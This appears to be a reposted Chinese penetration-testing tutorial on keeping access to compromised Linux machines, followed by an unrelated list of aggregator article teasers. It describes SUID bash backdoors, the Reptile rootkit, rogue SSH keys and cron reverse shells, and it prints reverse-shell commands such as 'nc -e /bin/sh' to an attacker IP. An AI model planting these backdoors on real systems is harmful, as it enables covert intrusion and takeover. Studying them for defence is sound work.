linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结

在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索。Linux也是在内网渗透中很常见的操作系统,但是其内部实现方式却与Windows有着本质的区别。我们在对Windows权限维持方式的基础上总结Linux系统的权限维持方式。

01SUID后门

SUID是Set uid的简称,当一个文件的所属主的标识位是x,且所属主为root时,当执行该文件时,是以root身份执行的。所以如果攻击者创建一个满足上述条件的文件,并且使用该文件反弹一个bash的话,就会使一个普通用户得到一个root权限的shell。

创建文件时必须具备以下条件:

  • SUID权限只对二进制程序有效;

  • 执行者对于该程序需要具有x的可执行权限;

  • 本权限仅在执行该程序的过程中有效;

  • 在执行过程中执行者将具有该程序拥有者的权限;

首先使用root权限创建一个suid权限的隐藏文件,这个文件是/bin/bash的复制文件。

88ae46bdcf8d1699691f1aa0ead4ef8c.png

其次,使用普通用户登入系统,使用如下命令/var/.hack -p,执行该文件以获得一个root shell,执行后可以看到权限已经变成了root权限。

0b0f6a77d674ceb9eb40348e4e8341ef.png02Linux内核Rootkit后门

     
内核级Linux Rootkit的隐藏性通常要借助对Linux系统调用的截获来达到目的,并且难以查杀、难以清除,危害巨大。主要适用的目标版本如下:

  • Debian 9:4.9.0-8-amd64

  • Debian 10:4.19.0-8-amd64

  • Ubuntu 18.04.1 LTS:4.15.0-38-generic

  • Kali Linux:4.18.0-kali2-amd64

  • Centos 6.10:2.6.32- 754.6.3.el6.x86_64

  • Centos 7:3.10.0-862.3.2.el7.x86_64

  • Centos 8:4.18.0-147.5.1.el8_1.x86_64

项目地址为:

https://github.com/f0rb1dd3n/Reptile

03SSH后门

SSH是Linux提供的一种远程登陆服务,SSH总共提供了两种登陆验证方式:一是账号密码登录,也是常用的登陆方式;二是公私钥登录,SSH允许验证登录者提供的私钥与自身公钥是否匹配,以确定是否允许该用户登录。具体验证方式如下:

ab573e96b4217cf989ea85120d43b3dc.png


首先攻击者在本地生成一份SSH登录的公私钥对,使用如下命令即可:

ssh-keygen -trsa。

9f5f853d682ef58919334ec26835d941.png


使用ssh-keygen生成两份文件,分别是id_rsa和id_rsa.pub前者是私钥文件,后者是公钥文件。使用某种方法,将攻击者生成的公钥文件id_rsa.pub上传进目标机~/.ssh/authorized_keys目录下即可。

c2901d4ee00e8d9456b1bba0f40c3ea8.png8a79d766ecd5947925d4f3f66f21d63b.png


使用ssh直接登录目标机即可,无需账号密码。

841b43cdd5a1f0220f7e7e021771f9f3.png04计划任务后门

与Windows一样,Linux也提供了计划任务程序,在Linux系统中计划任务一般是由cron承担。我们使用cron添加一个反弹shell的计划任务,以实现权限维持。

首先检查目标机是否开启了计划任务。

783a03d960242571545b547dc9d07adb.png

利用cron程序写入一个计划任务:’*/1 * * * * bash -I>& /dev/tcp// 0>&1’使其每一分钟向攻击者IP发弹一次shell。

560bc5ca4ee0c4e516ec725d64926dd9.png


在攻击机上监听相应的端口,过了一分钟即可接收到来自目标机的反弹shell,实现权限维持。

1a3adda8c15ed3c306a1ccd67b7e9a6b.png05Cat命令缺陷后门

Cat命令是Linux系统自带的指令,能够查看文件的具体内容。但是Cat指令却存在缺陷,cat默认是支持一些如\r回车符\n换行符\f换页符等特殊符号,这些符号可能导致一些内容被错误的解析,进而隐藏一些系统命令。

创建一个python文件,使其能够生成一个包含特殊符号的.sh文件,这个文件可以将恶意指令进行隐藏。

d2d3196142f4e6448a8bfab6e2cc369e.png


使用普通的cat指令查看这个.sh文件,发现恶意指令被隐藏。重新使用cat指令带上-A参数即可看到该文件的真实全部内容。可以查看到恶意指令:nc -e /bin/sh 192.168.210.37 9999。

7284b5942f18cfe808c7a0d70a1eb5c5.png

如果管理员没有仔细查看文件的具体内容就执行了该文件,攻击机则可以接到一个来自目标机的反弹shell。

b3e92501acd556739106415730ab94e9.png

36f1f8ad75ad17f31e81319b8a42d6d9.gif

59d6dde3957d74adb786ccf930554ad2.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/487572.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

深度学习模型并非“越大越好”,它可能引起气候变化问题

来源丨Forbes作者丨Rob Toews编译丨科技行者和当今的深度学习方法相比,我们大脑的效率高得不可思议。它们只有几磅重,大概只需要20瓦左右的能量消耗,这个能耗只能够给昏暗的灯泡供电。然而,它们代表了已知宇宙中最强大的智力形式。…

dismiss ios pop效果_iOS 动画框架pop使用方法

pop支持4种动画类型:弹簧动画效果、衰减动画效果、基本动画效果和自定义动画效果。弹簧动画效果1.效果图如下:2.控制器代码如下,首先用pod安装导入pop框架:#import "ViewController.h"#import interface ViewController ()endimplementation ViewControll…

万亿新基建,AI“芯”机遇在哪?| CCF-GAIR 2020

新基建中的5G、AI和智能计算等新一代高端芯片属于新赛道,需要构建全新生态。”来源:雷锋网自今年3月份提出,新基建就迅速成为了焦点。新基建涵盖5G基建、特高压、大数据中心、人工智能、工业互联网等七大领域。与以往基础设施建设的“铁公基”…

重磅!库克官宣苹果放弃英特尔,全面采用自研芯片,MAC迎来历史转折点

物联网智库 整理发布转载请注明来源和出处导 读苹果并没有完全放弃Intel平台的Mac,未来还会继续推出Intel版的Mac,两种平台会并行发展。不过,随着苹果陆续将英特尔处理器换成自研ARM芯片,两年过渡期后的苹果仍启用英特尔处理器的…

微信小程序开源Demo精选

来自:http://www.jianshu.com/p/0ecf5aba79e1 文/weapphome(简书作者) 原文链接:http://www.jianshu.com/p/0ecf5aba79e1 著作权归作者所有,转载请联系作者获得授权,并标注“简书作者”。 1. 仿…

不输GPS!30颗卫星全部就位!北斗三号全球卫星导航星座部署顺利收官

随着此次发射的成功,北斗三号30颗组网卫星已全部到位,北斗三号全球卫星导航系统星座部署全面完成。来源:澎湃新闻视频:多角度直击北斗三号全球系统“收官之星”发射瞬间,时长约1分12秒6月23日,由中国航天科…

Django ORM 数据库操作

比较有用 转自 http://blog.csdn.net/fgf00/article/details/53678205 一、DjangoORM 创建基本类型及生成数据库表结构 1、简介 2、创建数据库 表结构 二、Django ORM基本增删改查 1、表数据增删改查 2、表结构修改 三、Django ORM 字段类型 1、字段类型介绍 2、字段参数介绍 3…

AI芯片的另一条路

来源:半导体行业观察在先进工艺和架构的协同下,芯片的性能在过去几年获得了爆发性的增长,尤其是在最近几年火热的人工智能行业,这个取得的成就是有目共睹的。据OpenAI在2018年年中发表的报告,自 2012 年以来&#xff0…

JavaScript之event事件

目录 1:事件驱动1 2:事件分类2 3:事件对象event3 4:关于鼠标事件对象属性3 应用:5 5:关于键盘事件对象的属性6 6:目标事件源对象7 7. 事件冒泡7 应用:8 CSS模拟下拉菜单。8 综合应用…

四大全球卫星导航系统都能提供什么服务?

来源:远望智库预见未来远望智库特约专家 陈刘成卫星导航系统是人类发明的最为重要的时间和空间测量工具。没有测量就没有科学,没有测量就没有管理。卫星导航系统价值集中体现在帮助人类精确感知、认知、控制物质、能量、信息的时空运行与分布。目前已经建…

一文了解72名图灵奖获得者的成就

来源:图灵教育今天是计算机科学之父、人工智能之父 艾伦麦席森图灵 诞辰 108 周年。作为“图灵意志”的传承者,依照惯例,在今日纪念这位伟人。从“图灵机”到“图灵测试”,从破译德军的 Enigma 到自杀之谜,图灵一生都是…

安卓修改wifi已停用_手机连不上wifi显示已保存怎么回事【原因介绍】

问:为什么手机连不上wifi显示已保存?手机在连接WiFi的时候,WiFi显示已保存,手机连接不上wifi信号。请问这是什么原因引起的,应该怎么解决这个问题。答:如果手机连接wifi时,显示已保存,手机连接…

机器人智能抓取系统:目前几种主流的解决方案

文章来源:COBOT机器人大脑、新机器视觉机器人学习中的经典问题之一便是分拣:在一堆无序摆放的物品堆中,取出目标物品。在快递分拣员看来,这几乎是一个不需要思考的过程,但对于机械臂而言,这意味着复杂的矩阵…

bzoj1018 [SHOI2008]堵塞的交通traffic

题目链接 分析: 这道题的题解很长,所以就不粘题面了,我们一点一点讲明白这道题 很荣幸,我看了题面之后 想到了这道题 可以很高兴的发现10w是线段树能够承受的范围 我们可以利用线段树维护连通性,每个节点内我们要维…

Science重磅!人类特有基因触发猴子长出更强大的大脑

本文系生物谷原创编译,欢迎分享,转载须授权!人类大脑在进化过程中的扩张,特别是新大脑皮层的扩张,与诸如推理和语言等认知能力有关。有一种叫做ARHGAP11B的基因,只在人类身上表达,它能触发大脑干…

『实践』Matlab实现Flyod求最短距离及存储最优路径

Matlab实现Flyod求最短距离及存储最优路径 一、实际数据 已知图中所有节点的X、Y坐标。 图中的节点编号:矩阵中的编号 J01-J62:1-62; F01-F60:63-122; Z01-Z06:123-128; D01-D02:129-130. 二、Floyd求所有节点间的最小距离及通过矩阵存储最优路径的节点 1 function …

MIT Technology Review 2020年“十大突破性技术”解读 【中国科学基金】2020年第3期发布...

来源:国家自然科学基金委员会MIT Technology Review 2020年“十大突破性技术”解读[编者按] 2020年2月26日,MIT Technology Review一年一度的“十大突破性技术”榜单正式发布。自2001年起,该杂志每年都会评选出当年的…

大数据是怎么知道你去过新发地的?

来源:科学加(北京科技报记者:赵天宇)“经过全市大数据分析,您可能在5月30日(含)以后去过新发地批发市场……”随着新发地市场新冠源头被锁定,近日来,大数据筛查,成为不少北京市民在朋…

口罩巨头挑战“量子霸权”,3个月造出的『最强量子计算机』靠谱不?

摘要霍尼韦尔(Honeywell)最近可是非常忙活。作为全球数一数二的口罩厂商,疫情期间霍尼韦尔一直在努力生产口罩,大家对它的印象也多停留在口罩生产者的层面。但是事实上,人家是正经的多元化高科技制造企业,航空产品、汽车产品、涡轮…

三极管稳压管组成的线性电源关键理解

1. A点电压为20V.B点电压是稳压管电压5.6V.则A到B的电流是固定的。 2. 加电后在调整三极管,负载, 稳压管的电流回路如图。(注意电流方向,a->b电流方向和大小都是基本不变的。) 转载于:https://www.cnblogs.com/ture…